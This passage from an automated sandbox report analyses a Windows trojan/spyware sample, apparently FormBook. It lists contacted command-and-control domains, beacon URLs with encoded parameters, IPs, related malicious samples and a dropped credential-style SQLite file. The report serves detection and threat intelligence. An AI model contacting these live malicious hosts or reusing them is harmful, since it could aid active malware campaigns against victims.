                http://www.zrichiod-riech.sbs/kf10/?irCxl6=BMr36Ol4rNvSddxqg0HaAfLMG0b3PxYJLrZ3pB2pD+hE5HArYgxCudju8uwut0znVv+lDQdvUK2ZT/OSWW6E73ehYzW1pFh3giqPoWaMqdwg87w/En0YZeFR2W2LB0SR+w==&0FJ=D00hHLh0%Avira URL Cloudsafe
                https://shorty.bio/zSKcZ70%Avira URL Cloudsafe
                http://www.rwse6wjx.sbs/gtil/?0FJ=D00hHLh&irCxl6=yyp7zDkplnhFTYOX3ExWxIUq0IjfKVeUoM/g1Z3Itn+WrDb/JBNc3lr1wwtaU5LmbkDFl3V0HSUPXljFvyI/43E9pOq5Y7bgQWtruYXflXEVT6YhdPLVpdYAFb3D0RMErQ==0%Avira URL Cloudsafe
                https://www.fastmail.help/hc/en-us/articles/15000002801410%Avira URL Cloudsafe
                http://www.showyourstyle.top/zbqa/?irCxl6=VL/7+LncUKg93smxMKx16PJyQUb9eyDUwLSrEzeHp8x1IkOi8uzSCeY3r5BUse/S3M+vRdZQg/I11o5hNVVA7SQLtfVsXWgzAL3L+IJqGxdPdltrLo2WzEd+oOLSgjkcqA==&0FJ=D00hHLh0%Avira URL Cloudsafe
                http://www.rwse6wjx.sbs/gtil/0%Avira URL Cloudsafe
                http://www.rokeyfashion.store/nfd2/?irCxl6=Nz4SRZ+ZcsWDvLDLaExFXoqxLF9RdDOa1L87IpfF7DS4rl0CQqW5nKUTlgEwSOCJB6dlUsv6D3EsaGzmyQ5ZB5AOjp44EvTwqJF0vghgjnDPOb2iH8sdTWQtstyoz2bs+w==&0FJ=D00hHLh0%Avira URL Cloudsafe
                http://www.lucelight.info/up4e/?irCxl6=VXc1jWSgqs8x7qdgafwEWVcLTvt60MncsX8sB3hxkBZ1r/WG9R0muDMsDsUoNKEWb3GhLvkp8KOPLwQ4Bi3owHJAbIJD7pBSH8qbt8k3G95dMvpBnol4dqnd3B3JqqcnGw==&0FJ=D00hHLh0%Avira URL Cloudsafe
                http://www.absseguridad.online/3io6/?irCxl6=gcX2VOQ36WC77lysui5XZ/m5rPyYNRmqhqSEheNQdnlbGlnbCsY2Ojxac1DjYk++nD1McxY4sUfZTb3NP1oMnhI4fmsR5776EaSkwHcYG6c3TDmsIPc66LvHumOhTsoWEA==&0FJ=D00hHLh0%Avira URL Cloudsafe
                http://www.zrichiod-riech.sbs/kf10/0%Avira URL Cloudsafe
                http://www.absseguridad.online/3io6/0%Avira URL Cloudsafe
                http://www.vietnamtour.pro/wmxx/0%Avira URL Cloudsafe
                http://www.binjai77rtp11f.xyz/9fei/0%Avira URL Cloudsafe
                http://www.showyourstyle.top/zbqa/0%Avira URL Cloudsafe
                http://www.vietnamtour.pro/wmxx/?0FJ=D00hHLh&irCxl6=zdZDiDz9NcDAxdPT/uWXYjOZ7xdg3NSLew0AnBcQq7wq0cWPcv1qrwj1W7YWM/gj4sM+0wouZwjbIFjwenXJ+O4VSQPSXkwvnSmJEYaf1BK13FkupONapGDJTjw9KvkhIA==0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.zrichiod-riech.sbs
                		188.114.96.3
                		truetrue
                  		unknown
                  absseguridad.online
                  		84.32.84.32
                  		truetrue
                    		unknown
                    www.showyourstyle.top
                    		69.57.163.64
                    		truetrue
                      		unknown
                      www.lucelight.info
                      		103.168.172.37
                      		truetrue
                        		unknown
                        rokeyfashion.store
                        		103.159.36.66
                        		truetrue
                          		unknown
                          www.binjai77rtp11f.xyz
                          		104.21.28.65
                          		truetrue
                            		unknown
                            b1-3-r111.kunlundns.top
                            		101.32.205.61
                            		truetrue
                              		unknown
                              www.vietnamtour.pro
                              		172.67.138.138
                              		truetrue
                                		unknown
                                www.daystarcafe.net
                                		208.91.197.27
                                		truetrue
                                  		unknown
                                  www.3nhc3a.top
                                  		20.2.208.137
                                  		truefalse
                                    		unknown
                                    www.rwse6wjx.sbs
                                    		unknown
                                    		unknownfalse
                                      		unknown
                                      www.absseguridad.online
                                      		unknown
                                      		unknownfalse
                                        		unknown
                                        www.rokeyfashion.store
                                        		unknown
                                        		unknownfalse
                                          		unknown

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          http://www.showyourstyle.top/zbqa/?irCxl6=VL/7+LncUKg93smxMKx16PJyQUb9eyDUwLSrEzeHp8x1IkOi8uzSCeY3r5BUse/S3M+vRdZQg/I11o5hNVVA7SQLtfVsXWgzAL3L+IJqGxdPdltrLo2WzEd+oOLSgjkcqA==&0FJ=D00hHLhtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.rokeyfashion.store/nfd2/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.lucelight.info/up4e/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.zrichiod-riech.sbs/kf10/?irCxl6=BMr36Ol4rNvSddxqg0HaAfLMG0b3PxYJLrZ3pB2pD+hE5HArYgxCudju8uwut0znVv+lDQdvUK2ZT/OSWW6E73ehYzW1pFh3giqPoWaMqdwg87w/En0YZeFR2W2LB0SR+w==&0FJ=D00hHLhtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.binjai77rtp11f.xyz/9fei/?irCxl6=9hwMTPf/o+GewSNr0PZcNyjUpNs4oV11JaaOJ/4hdktbA5fMK3ajxj9W7lKuvaKLl9eyr3kbg9/8Pn7CG+MHPzFPLCnPEL+bBN+DL4U4BkbYG2HsYKvT3cQqMuOVV8lKBQ==&0FJ=D00hHLhtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.rwse6wjx.sbs/gtil/?0FJ=D00hHLh&irCxl6=yyp7zDkplnhFTYOX3ExWxIUq0IjfKVeUoM/g1Z3Itn+WrDb/JBNc3lr1wwtaU5LmbkDFl3V0HSUPXljFvyI/43E9pOq5Y7bgQWtruYXflXEVT6YhdPLVpdYAFb3D0RMErQ==true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.rwse6wjx.sbs/gtil/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.rokeyfashion.store/nfd2/?irCxl6=Nz4SRZ+ZcsWDvLDLaExFXoqxLF9RdDOa1L87IpfF7DS4rl0CQqW5nKUTlgEwSOCJB6dlUsv6D3EsaGzmyQ5ZB5AOjp44EvTwqJF0vghgjnDPOb2iH8sdTWQtstyoz2bs+w==&0FJ=D00hHLhtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.lucelight.info/up4e/?irCxl6=VXc1jWSgqs8x7qdgafwEWVcLTvt60MncsX8sB3hxkBZ1r/WG9R0muDMsDsUoNKEWb3GhLvkp8KOPLwQ4Bi3owHJAbIJD7pBSH8qbt8k3G95dMvpBnol4dqnd3B3JqqcnGw==&0FJ=D00hHLhtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.absseguridad.online/3io6/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.vietnamtour.pro/wmxx/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.zrichiod-riech.sbs/kf10/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.showyourstyle.top/zbqa/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.vietnamtour.pro/wmxx/?0FJ=D00hHLh&irCxl6=zdZDiDz9NcDAxdPT/uWXYjOZ7xdg3NSLew0AnBcQq7wq0cWPcv1qrwj1W7YWM/gj4sM+0wouZwjbIFjwenXJ+O4VSQPSXkwvnSmJEYaf1BK13FkupONapGDJTjw9KvkhIA==true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.binjai77rtp11f.xyz/9fei/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.absseguridad.online/3io6/?irCxl6=gcX2VOQ36WC77lysui5XZ/m5rPyYNRmqhqSEheNQdnlbGlnbCsY2Ojxac1DjYk++nD1McxY4sUfZTb3NP1oMnhI4fmsR5776EaSkwHcYG6c3TDmsIPc66LvHumOhTsoWEA==&0FJ=D00hHLhtrue
                                          • Avira URL Cloud: safe
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://cdn.jsdelivr.net/npm/TCPSVCS.EXE, 00000005.00000002.3904938820.0000000003936000.00000004.10000000.00040000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.00000000030C6000.00000004.00000001.00040000.00000000.sdmpfalse
                                            		high
                                            https://cdn.livechatinc.com/tracking.jsTCPSVCS.EXE, 00000005.00000002.3904938820.0000000003936000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3906452676.0000000005920000.00000004.00000800.00020000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.00000000030C6000.00000004.00000001.00040000.00000000.sdmpfalse
                                              		high
                                              https://duckduckgo.com/chrome_newtabTCPSVCS.EXE, 00000005.00000003.1956275486.00000000073AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://cdnjs.cloudflare.com/ajax/libs/jquery.lazy/1.7.9/jquery.lazy.plugins.min.jsTCPSVCS.EXE, 00000005.00000002.3904938820.0000000003936000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3906452676.0000000005920000.00000004.00000800.00020000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.00000000030C6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  		high
                                                  https://duckduckgo.com/ac/?q=TCPSVCS.EXE, 00000005.00000003.1956275486.00000000073AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://cdn.jsdelivr.net/npm/bootstrapkwRriiLHUBrBci.exe, 00000006.00000002.3903610793.00000000030C6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      		high
                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoTCPSVCS.EXE, 00000005.00000003.1956275486.00000000073AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=TCPSVCS.EXE, 00000005.00000003.1956275486.00000000073AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.0/jquery.min.jsTCPSVCS.EXE, 00000005.00000002.3904938820.0000000003936000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3906452676.0000000005920000.00000004.00000800.00020000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.00000000030C6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            		high
                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=TCPSVCS.EXE, 00000005.00000003.1956275486.00000000073AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://rokeyfashion.store/nfd2/?irCxl6=Nz4SRZTCPSVCS.EXE, 00000005.00000002.3904938820.0000000003F7E000.00000004.10000000.00040000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.000000000370E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://cdnjs.cloudflare.com/ajax/libs/jquery.lazy/1.7.9/jquery.lazy.min.jsTCPSVCS.EXE, 00000005.00000002.3904938820.0000000003936000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3906452676.0000000005920000.00000004.00000800.00020000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.00000000030C6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                		high
                                                                https://shorty.bio/zSKcZ7kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.00000000030C6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.ecosia.org/newtab/TCPSVCS.EXE, 00000005.00000003.1956275486.00000000073AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.fastmail.help/hc/en-us/articles/1500000280141TCPSVCS.EXE, 00000005.00000002.3904938820.0000000004110000.00000004.10000000.00040000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.00000000038A0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.absseguridad.onlinekwRriiLHUBrBci.exe, 00000006.00000002.3905770259.0000000004FE6000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://ac.ecosia.org/autocomplete?q=TCPSVCS.EXE, 00000005.00000003.1956275486.00000000073AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchTCPSVCS.EXE, 00000005.00000003.1956275486.00000000073AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.fastmailusercontent.com/filestorage/css/main.cssTCPSVCS.EXE, 00000005.00000002.3904938820.0000000004110000.00000004.10000000.00040000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.00000000038A0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.livechatinc.com/chat-with/13793973/TCPSVCS.EXE, 00000005.00000002.3904938820.0000000003936000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3906452676.0000000005920000.00000004.00000800.00020000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.00000000030C6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.livechatinc.com/?welcomeTCPSVCS.EXE, 00000005.00000002.3904938820.0000000003936000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3906452676.0000000005920000.00000004.00000800.00020000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.00000000030C6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=TCPSVCS.EXE, 00000005.00000003.1956275486.00000000073AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high

                                                                              World Map of Contacted IPs

                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs

                                                                              Public IPs

                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              69.57.163.64
                                                                              		www.showyourstyle.topUnited States
                                                                              		25653FORTRESSITXUStrue
                                                                              103.168.172.37
                                                                              		www.lucelight.infounknown
                                                                              		7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNetrue
                                                                              20.2.208.137
                                                                              		www.3nhc3a.topUnited States
                                                                              		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                              101.32.205.61
                                                                              		b1-3-r111.kunlundns.topChina
                                                                              		132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNtrue
                                                                              188.114.96.3
                                                                              		www.zrichiod-riech.sbsEuropean Union
                                                                              		13335CLOUDFLARENETUStrue
                                                                              84.32.84.32
                                                                              		absseguridad.onlineLithuania
                                                                              		33922NTT-LT-ASLTtrue
                                                                              172.67.138.138
                                                                              		www.vietnamtour.proUnited States
                                                                              		13335CLOUDFLARENETUStrue
                                                                              103.159.36.66
                                                                              		rokeyfashion.storeunknown
                                                                              		134687TWIDC-AS-APTWIDCLimitedHKtrue
                                                                              104.21.28.65
                                                                              		www.binjai77rtp11f.xyzUnited States
                                                                              		13335CLOUDFLARENETUStrue

                                                                              General Information

                                                                              Joe Sandbox version:42.0.0 Malachite
                                                                              Analysis ID:1587873
                                                                              Start date and time:2025-01-10 18:52:12 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 10m 53s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:10
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:2
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:ofZiNLLKZU.exe
                                                                              renamed because original name is a hash value
                                                                              Original Sample Name:eeeaa1d7c634e0cc3f1550e756208a118f28be191b374ba6a2e3690f89949751.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.evad.winEXE@7/3@12/9
                                                                              EGA Information:
                                                                              • Successful, ratio: 75%
                                                                              HCA Information:
                                                                              • Successful, ratio: 90%
                                                                              • Number of executed functions: 47
                                                                              • Number of non-executed functions: 291
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                              Warnings

                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 4.175.87.197, 20.109.210.53
                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                              Simulations

                                                                              Behavior and APIs

                                                                              TimeTypeDescription
                                                                              12:54:16API Interceptor10201295x Sleep call for process: TCPSVCS.EXE modified

                                                                              Joe Sandbox View / Context

                                                                              IPs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              69.57.163.643HnH4uJtE7.exeGet hashmaliciousFormBookBrowse
                                                                              • www.startsomething.xyz/9er8/
                                                                              DHL.exeGet hashmaliciousFormBookBrowse
                                                                              • www.startsomething.xyz/9er8/
                                                                              Salmebogs(1).exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • www.openhorizons.pro/ir2n/
                                                                              103.168.172.37Salmebogs(1).exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • www.lucelight.info/ygu8/
                                                                              firmware.i686.elfGet hashmaliciousUnknownBrowse
                                                                              • 103.168.172.37/
                                                                              Fzfee1Lgc2.elfGet hashmaliciousUnknownBrowse
                                                                              • cloud.hgriggs.com/
                                                                              Documente de expediere.exeGet hashmaliciousFormBookBrowse
                                                                              • www.jleabres.com/w977/
                                                                              jlsvOH1c8bSRKqM.exeGet hashmaliciousFormBookBrowse
                                                                              • www.jleabres.com/blhi/
                                                                              eNXDCIvEXI.exeGet hashmaliciousFormBookBrowse
                                                                              • www.celebration24.co.uk/mcz6/
                                                                              H25iQbxCki.exeGet hashmaliciousFormBookBrowse
                                                                              • www.celebration24.co.uk/mcz6/
                                                                              Factura (3).exeGet hashmaliciousFormBookBrowse
                                                                              • www.celebration24.co.uk/mcz6/
                                                                              PO0424024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • www.celebration24.co.uk/pq0o/
                                                                              20.2.208.137Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                              • www.b2iqd.top/g8fb/
                                                                              MV Sunshine.exeGet hashmaliciousFormBookBrowse
                                                                              • www.b2iqd.top/g8fb/

                                                                              Domains

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              www.zrichiod-riech.sbsSHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                                              • 172.67.176.240
                                                                              www.lucelight.infoSalmebogs(1).exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 103.168.172.37
                                                                              b1-3-r111.kunlundns.topSHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                                              • 101.32.205.61
                                                                              ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 43.155.76.124
                                                                              SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                              • 43.155.76.124
                                                                              PO-DC13112024_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                              • 43.155.76.124
                                                                              3NvALxFlHV.exeGet hashmaliciousFormBookBrowse
                                                                              • 43.155.76.124
                                                                              COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                                              • 43.155.76.124
                                                                              QUOTE2342534.exeGet hashmaliciousFormBookBrowse
                                                                              • 129.226.56.200
                                                                              COMMERCAIL INVOICE AND DHL AWB TRACKING DETAIL.exeGet hashmaliciousFormBookBrowse
                                                                              • 129.226.56.200
                                                                              Re property pdf.exeGet hashmaliciousFormBookBrowse
                                                                              • 129.226.56.200

                                                                              ASNs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              CLOUDFLARENETUS3HnH4uJtE7.exeGet hashmaliciousFormBookBrowse
                                                                              • 104.21.48.233
                                                                              https://www.mentimeter.com/app/presentation/alp52o7zih4ubnvbqe9pvb585a1z3bd7/edit?source=share-modalGet hashmaliciousUnknownBrowse
                                                                              • 104.17.25.14
                                                                              AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 104.21.64.1
                                                                              eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                              • 104.21.64.1
                                                                              Encrypted_Archive_2025_LHC1W64SMW.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                              • 104.17.25.14
                                                                              MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                              • 104.21.96.1
                                                                              3WgNXsWvMO.exeGet hashmaliciousMassLogger RATBrowse
                                                                              • 104.21.80.1
                                                                              SBkuP3ACSA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 104.21.16.1
                                                                              KcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
                                                                              • 188.114.96.3
                                                                              secured File__esperion.com.htmlGet hashmaliciousPhisherBrowse
                                                                              • 104.17.25.14
                                                                              AARNET-AS-APAustralianAcademicandResearchNetworkAARNegrW5hyK960.exeGet hashmaliciousUnknownBrowse
                                                                              • 103.191.208.122
                                                                              grW5hyK960.exeGet hashmaliciousUnknownBrowse
                                                                              • 103.191.208.122
                                                                              3.elfGet hashmaliciousUnknownBrowse
                                                                              • 150.203.42.56
                                                                              5.elfGet hashmaliciousUnknownBrowse
                                                                              • 103.190.121.10
                                                                              armv7l.elfGet hashmaliciousUnknownBrowse
                                                                              • 103.184.255.2
                                                                              Fantazy.mips.elfGet hashmaliciousUnknownBrowse
                                                                              • 103.179.208.2
                                                                              Fantazy.x86.elfGet hashmaliciousUnknownBrowse
                                                                              • 103.163.1.75
                                                                              Fantazy.m68k.elfGet hashmaliciousUnknownBrowse
                                                                              • 103.185.194.66
                                                                              https://t.co/qNQo33w8wDGet hashmaliciousHTMLPhisherBrowse
                                                                              • 103.67.200.72
                                                                              3.elfGet hashmaliciousUnknownBrowse
                                                                              • 157.85.170.191
                                                                              MICROSOFT-CORP-MSN-AS-BLOCKUSEncrypted_Archive_2025_LHC1W64SMW.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                              • 40.99.149.210
                                                                              secured File__esperion.com.htmlGet hashmaliciousPhisherBrowse
                                                                              • 51.144.100.160
                                                                              http://atozpdfbooks.comGet hashmaliciousUnknownBrowse
                                                                              • 150.171.27.10
                                                                              http://infarmbureau.comGet hashmaliciousUnknownBrowse
                                                                              • 52.252.156.53
                                                                              https://www.filemail.com/d/rxythqchkhluipl?skipreg=trueGet hashmaliciousUnknownBrowse
                                                                              • 40.126.32.72
                                                                              sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                              • 104.208.173.191
                                                                              https://eu.jotform.com/app/250092704521347Get hashmaliciousUnknownBrowse
                                                                              • 13.107.253.45
                                                                              http://loginmicrosoftonline.Bdo.scoremasters.gr/cache/cdn?email=christian.wernli@bdo.chGet hashmaliciousUnknownBrowse
                                                                              • 13.107.253.45
                                                                              5b118cb6-e85d-926b-b917-b9317aeed46c.emlGet hashmaliciousUnknownBrowse
                                                                              • 52.113.194.132
                                                                              https://app.planable.io/review/0OPaw36t6M_kGet hashmaliciousHTMLPhisherBrowse
                                                                              • 13.69.239.72
                                                                              TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNhttps://app.whirr.co/p/cm4711if90205nv0h2e4l0imuGet hashmaliciousUnknownBrowse
                                                                              • 170.106.97.195
                                                                              ReIayMSG__polarisrx.com_#7107380109.htmGet hashmaliciousHTMLPhisherBrowse
                                                                              • 119.28.146.206
                                                                              ReIayMSG__polarisrx.com_#6577807268.htmGet hashmaliciousHTMLPhisherBrowse
                                                                              • 119.28.147.117
                                                                              VM_MSG-Gf.htmGet hashmaliciousHTMLPhisherBrowse
                                                                              • 119.28.147.117
                                                                              https://e.trustifi.com/#/fff2a0/670719/6dc158/ef68bf/5e1243/19ce62/f4cd99/c6b84a/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/d78873/cd64d0/869af2/e9ab57/7015c1/91dda7/f34c0a/f30b47/688cba/a1d645/18dc79/33d9f9/9ee0a0/c61099/8f2456/8e1864/996369/790047/a93a09/347b17/38082d/363d49/f88c07/81bae2/57a7bb/6027c6/942952/b2de1b/e98aef/6a05c2/91297b/c70871/7f29c3/0a450d/ad0cac/967c2a/e7cb67/6e1193/8c4088/13aef1/e1d296/5056d4/51a97e/89a35b/c13e69/fa274a/5b7c2e/a8c901/02856f/1e0211/03ca84/d7b573/7e0de3/e2bdbb/7cab47/4dd465/addb41/2076e1/85559c/dbcb2d/514505/a6a54e/41e864/abb5a5/e59e4b/8c2df6/7e5cf3/b648da/8fbd98/4c7d8a/08e6a3/72f66f/a49cc6/18211b/1e6a5c/0d4fdeGet hashmaliciousHTMLPhisherBrowse
                                                                              • 49.51.78.226
                                                                              https://jmak-service.com/3225640388Get hashmaliciousHTMLPhisherBrowse
                                                                              • 49.51.77.119
                                                                              https://pozaweclip.upnana.com/Get hashmaliciousUnknownBrowse
                                                                              • 170.106.97.195
                                                                              https://e.trustifi.com/#/fff2a0/615048/6b9108/bb6bb8/0c4d40/10c266/f490c9/97ed1b/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/85de28/9434d8/86c8f5/bcad02/214fc7/998ea3/f74550/f15e41/328dbb/f2d014/49d879/3689f7/91b4f6/9617cd/897401/851960/993266/280340/ae6054/337b49/6f0428/673840/abdb07/82b8be/00f4e1/3270c4/922952/b4db4e/e9dcee/3a01c5/962a76/930521/2e7fc6/514759/a95ca8/c37226/be9e63/3c4ec2/89148e/13fdfe/ea86c0/04048b/56ab74/dca15f/97696c/fa7912/512e28/fc9f59/50d13f/4f0114/039a8f/84bd72/2603b6/e0eceb/28f211/4fdb34/a1dc16/2076ef/8e55cf/8f9d2c/0d4402/f5a713/43ec64/fabda1/b6994c/da2da1/2851a8/b04ed3/8cea9a/1e21dc/0abaf5/7df73e/f39a96/1f2244/423c00/5c4e8dGet hashmaliciousHTMLPhisherBrowse
                                                                              • 49.51.77.119
                                                                              Vernales Restaurant-encrypted.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                              • 170.106.97.195
                                                                              x86_64.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                              • 170.106.90.48
                                                                              FORTRESSITXUS3HnH4uJtE7.exeGet hashmaliciousFormBookBrowse
                                                                              • 69.57.163.64
                                                                              Benefit_401k_2025_Enrollment.pdfGet hashmaliciousUnknownBrowse
                                                                              • 69.57.162.6
                                                                              miori.spc.elfGet hashmaliciousUnknownBrowse
                                                                              • 69.72.254.176
                                                                              sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                              • 208.116.70.219
                                                                              DHL.exeGet hashmaliciousFormBookBrowse
                                                                              • 69.57.163.64
                                                                              la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                                              • 65.98.32.221
                                                                              Salmebogs(1).exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 69.57.163.64
                                                                              http://dimfa.elcompanies.digitalillustra.comGet hashmaliciousUnknownBrowse
                                                                              • 65.181.111.144
                                                                              RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                                              • 69.57.163.227
                                                                              RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                              • 69.57.163.227

                                                                              JA3 Fingerprints

                                                                              No context

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

                                                                              C:\Users\user\AppData\Local\Temp\164U99

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\TCPSVCS.EXE
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                              Category:dropped
                                                                              Size (bytes):196608
                                                                              Entropy (8bit):1.1209886597424439
                                                                              Encrypted:false
                                                                              SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
